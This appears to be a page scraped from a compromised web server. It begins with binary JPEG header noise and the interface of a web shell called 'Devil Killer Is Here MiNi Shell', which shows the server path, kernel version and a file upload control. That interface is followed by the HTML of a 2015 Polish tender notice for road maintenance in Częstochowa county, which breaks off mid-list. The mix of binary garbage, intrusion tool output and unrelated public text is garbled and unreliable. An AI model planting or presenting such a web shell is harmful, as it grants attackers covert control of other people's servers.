JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150320/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150320/63238-N-2015.html

<p class="kh_header"><b>Częstochowa: Bieżące utrzymanie jezdni, chodników, pobocza i urządzeń odwadniających dróg powiatowych oraz dróg wojewódzkich na terenie Powiatu Częstochowskiego</b><br>
<b>Numer ogłoszenia: 63238 - 2015; data zamieszczenia: 20.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg w Częstochowie , ul. Sobieskiego 9, 42-217 Częstochowa, woj. śląskie, tel. 034 3785467, faks 034 3785468.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdczestochowa.4bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie jezdni, chodników, pobocza i urządzeń odwadniających dróg powiatowych oraz dróg wojewódzkich na terenie Powiatu Częstochowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na bieżącym utrzymaniu jezdni, chodników, pobocza i urządzeń odwadniających dróg powiatowych o długości 577,9 km oraz dróg wojewódzkich o długości 141,1 km na terenie Powiatu Częstochowskiego w granicach gmin: Blachownia, Dąbrowa Zielona, Janów, Kamienica Polska, Kłomnice, Koniecpol. Konopiska, Kruszyna, Lelów, Mstów, Mykanów, Olsztyn, Poczesna, Przyrów, Rędziny i Starcza z podziałem na cztery zadania, tj. Zadania 1, 2, 3 w okresie od podpisania umowy do 30.11.2015 r., Zadanie 4 do 31.03.2016 r. zgodnie z podziałem na 4 zadania:
Zadanie nr 1 Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 - 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 - 6 cm na terenie ODM 1 Rudniki w okresie od podpisania umowy do 30.11.2015 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg po okresie zimowym wykonane do dnia 31.05.2015 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 01.06.2015 r. do 30.11.2015 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia.
Zadanie nr 2 Remont cząstkowy nawierzchni dróg powiatowych i wojewódzkich przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 - 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 - 6 cm na terenie ODM 2 Koniecpol w okresie od podpisania umowy do 30.11.2015 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg po okresie zimowym wykonane do dnia 31.05.2015 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 01.06.2015 r. do 30.11.2015 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia.
Zadanie nr 3 Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 - 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 - 6 cm na terenie ODM 3 Poczesna w okresie od podpisania umowy do 30.11.2015 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg po okresie zimowym wykonane do dnia 31.05.2015 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 01.06.2015 r. do 30.11.2015 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia.
Zadanie nr 4
Remonty cząstkowe nawierzchni dróg powiatowych i wojewódzkich mieszanką mineralno - asfaltową, likwidacja przełomów, inne roboty utrzymaniowe oraz remont i bieżące utrzymanie przepustów i odwodnienie korpusu drogowego na drogach powiatowych i wojewódzkich w okresie od podpisania umowy do 31.03.2016 r. 
Opis: 
1.	Remont cząstkowy nawierzchni dróg powiatowych i wojewódzkich mieszanką mineralno - asfaltową oraz likwidacja przełomów będzie obejmować następujące etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg po okresie zimowym wykonany do dnia 31.05.2015 r. wg bieżących potrzeb i zleceń,
-	II Etap obejmuje okres od 01.06.2015 r. do 31.03.2016 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia.
2.	Wykonanie innych robót utrzymaniowych obejmuje bieżące utrzymanie jezdni, chodników, poboczy w okresie od podpisania umowy do dnia 31.12.2015 r. wg zleceń i zakresu robót uzgodnionego z Zamawiającym.
3.	Remont i bieżące utrzymanie przepustów i odwodnienie korpusu drogowego wg zleceń i zakresu robót uzgodnionego z Zamawiającym w okresie od podpisania umowy do dnia 31.12.2015 r..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające, o których mowa w art. 67 ust.1 pkt 6 Pzp w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych, stanowiące nie więcej niż 50 % wartości zamówienia podstawowego i polegające na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda oferta musi być zabezpieczona wadium odpowiednio do zadania:
1.	Zadanie nr 1 - Zamawiający nie wymaga wpłacania wadium,
2.	Zadanie nr 2 - Zamawiający nie wymaga wpłacania wadium,
3.	Zadanie nr 3 - Zamawiający nie wymaga wpłacania wadium,
4.	Zadanie nr 4 wadium w wysokości: 30.000,00 zł. (słownie: trzydzieści tysięcy złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają wiedzę i doświadczenie tj.: wykonali w okresie ostatnich 5 lat przed upływem terminu składania ofert, albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie roboty budowlane, odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia zawierające się w 1 umowie, o wartości wykonanych robót nie mniejszej niż: 100.000,00 zł (brutto).
Określenie roboty budowlane odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia oznacza: wykonanie robót na drogach publicznych, utrzymanie dróg publicznych odpowiadających swoim rodzajem robotom określonym w przedmiocie zamówienia.


Ocena spełnienia ww. warunku dokonana zostanie w oparciu o informacje zawarte w dokumentach wyszczególnionych odpowiednio w siwz. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunek wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednim potencjałem technicznym do wykonania zamówienia (dotyczy momentu realizacji umowy) tj.: będą dysponować potencjałem technicznym - podstawowym wyposażeniem technicznym (np. remontery drogowe, koparki, walce drogowe, rozkładarka mas bitumicznych i inny sprzęt wykazany w kosztorysie ofertowym) przewidziane do użycia przy realizacji przedmiotowego zamówienia odpowiednio do zadania, tj. 
-	dla Zadań nr 1, 2 i 3 - dysponowania co najmniej 1-ym remonterem drogowym,
-	dla Zadania nr 4 - dysponowania podstawowym wyposażeniem technicznym przewidzianym do użycia przy realizacji przedmiotowego zadania tj. walce drogowe, frezarka, rozkładarka mas bitumicznych, ścinarkę pobocza, koparkę do rowów i inny sprzęt wykazany w kosztorysie ofertowym 
W przypadku złożenia oferty na jedno, dwa, trzy lub cztery zadania Wykonawca musi dysponować powyższym sprzętem osobno na każde z zadań.
Ocena spełnienia ww. warunku dokonana zostanie w oparciu o informacje zawarte w dokumentach wyszczególnionych odpowiednio w siwz. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunek wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują  osobami zdolnymi do wykonania zamówienia (dotyczy momentu realizacji umowy) tj.: będą dysponować osobą/-ami - kierownikiem budowy/kierownikami - posiadającą/-ymi uprawnienia zgodne z przedmiotem zamówienia branża drogowa lub bez ograniczeń w pełnieniu obowiązków Kierownika Budowy, zgodnie z wymogiem ustawy Prawo budowlane z dnia 7 lipca 1994 r. (tekst jednolity Dz. U. Z 2006 r. Nr 156, poz. 1118 ze zm.).

Ocena spełnienia ww. warunku dokonana zostanie w oparciu o informacje zawarte w dokumentach wyszczególnionych odpowiednio w siwz. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunek wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące sytuacji ekonomicznej i finansowej tj.: posiadają ubezpieczenie swojej działalności od odpowiedzialności cywilnej w wysokości min. 200.000,00 zł. w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Ocena spełnienia ww. warunku dokonana zostanie w oparciu o informacje zawarte w dokumentach wyszczególnionych odpowiednio w siwz. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunek wykonawca spełnił</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dowody (zgodnie z §1 ust. 2 ROZPORZĄDZENIA PREZESA RADY MINISTRÓW z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane) dotyczące najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, gdy wykonawca sam nie dysponuje takim potencjałem. 2. Oświadczenie o spełnieniu warunków udziału w postępowaniu -załącznik nr 3 do siwz. 3. Dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawce reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentowania wykonawcy. 4. Jeżeli Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów oświadczenia o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp (wzór zał. nr 2).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Doświadczenie - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Warunki i zakres zmian:
-	czynniki zewnętrzne (np. warunki atmosferyczne, przedłużone wydawanie decyzji) zmiana ilości i wartości rozliczeń, modyfikacje wywołane zmianami obowiązujących przepisów, zmiana adresu Wykonawcy lub Zamawiającego, zmiana osób występujących po stronie Wykonawcy lub Zamawiającego, zmiana będąca skutkiem oczywistej omyłki, zmiana terminu wykonania przedmiotu umowy, zmiana (zwiększenie) wartości przedmiotu zamówienia spowodowana dodaniem ilości zakresu robót (zależy od sytuacji finansowej zamawiającego i od zapotrzebowania wykonania robót), - do czynników zewnętrznych nie wlicza się problemów z winy wykonawcy przy realizacji przedmiotu zamówienia.
-	przypadki losowe: zmiana w trakcie robót składu zespołu kierującego robotami budowlanymi, zmiana podwykonawców, dodanie podwykonawców- (z zastrzeżeni pkt 1.3. część III SIWZ), zmiana sprzętów na inne odpowiadające zapisom SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdczestochowa.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Częstochowie, ul. Sobieskiego 9, II piętro, pokój nr 244.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2015 godzina 09:00, miejsce: Powiatowy Zarząd Dróg w Częstochowie, ul. Sobieskiego 9, II piętro, pokój nr 241, sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 - 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 - 6 cm na terenie ODM 1 Rudniki w okresie od podpisania umowy do 30.11.2015 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont cząstkowy nawierzchni dróg powiatowych przy użyciu emulsji szybko rozpadowej i grysów bazaltowych o wym. 2 - 5 mm wbudowanych pod ciśnieniem przy użyciu remontera, przy średniej głębokości ubytków 2 - 6 cm na terenie ODM 1 Rudniki w okresie od podpisania umowy do 30.11.2015 r. z podziałem na etapy:
-	I Etap obejmuje remonty cząstkowe nawierzchni dróg po okresie zimowym wykonane do dnia 31.05.2015 r. wg bieżących potrzeb i zleceń.
-	II Etap obejmuje okres od 01.06.2015 r. do 30.11.2015 r. wg bieżących potrzeb i zleceń, oraz usuwanie uszkodzeń zagrażających bezpieczeństwu ruchu drogowego nie później niż 24 godziny od zgłoszenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.41-9, 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
